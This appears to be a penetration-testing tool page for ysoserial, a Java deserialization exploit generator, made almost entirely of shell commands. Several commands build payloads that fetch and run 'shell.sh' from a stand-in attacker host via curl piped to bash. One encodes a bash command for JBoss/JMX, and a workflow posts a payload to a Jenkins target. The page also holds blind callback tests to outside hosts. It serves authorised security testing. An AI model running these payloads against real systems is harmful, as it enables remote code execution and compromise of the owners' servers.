Skip to content

ysoserial

Java deserialization exploit payload generator

JavaGitHub

Description

ysoserial is a collection of utilities and property-oriented programming gadget chains for generating payloads that exploit unsafe Java object deserialization. It's essential for testing Java applications accepting serialized objects.

Installation

BASH 
# Download pre-built JAR
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar

# Or build from source
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial && mvn clean package -DskipTests

Basic Usage

BASH 
# List available gadget chains
java -jar ysoserial-all.jar

# Generate CommonsCollections1 payload
java -jar ysoserial-all.jar CommonsCollections1 "id" > payload.ser

# RCE via CommonsCollections5
java -jar ysoserial-all.jar CommonsCollections5 "curl http://attacker.com/shell.sh | bash" > payload.ser

Advanced Usage

BASH 
# DNS exfiltration (blind testing)
java -jar ysoserial-all.jar URLDNS "http://your-collaborator-url" > dns_payload.ser

# Generate base64-encoded payload
java -jar ysoserial-all.jar CommonsCollections6 "whoami" | base64 -w0

# Exploit JBoss/JMX
java -jar ysoserial-all.jar CommonsCollections1 'bash -c {echo,BASE64_ENCODED_CMD}|{base64,-d}|{bash,-i}' > payload.ser

# Test with different chains
for chain in CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6; do
  java -jar ysoserial-all.jar $chain "curl http://callback.oast.fun/$chain" > "${chain}.ser"
done

Common Workflows

BASH 
# Blind deserialization testing with OOB callback
java -jar ysoserial-all.jar URLDNS "http://abc123.oast.fun" | base64 -w0
# Inject the base64 payload into Cookie/parameter

# Jenkins exploitation
java -jar ysoserial-all.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash" > jenkins.ser
curl -X POST http://jenkins-target:8080/upload -d @jenkins.ser
Back to Exploitation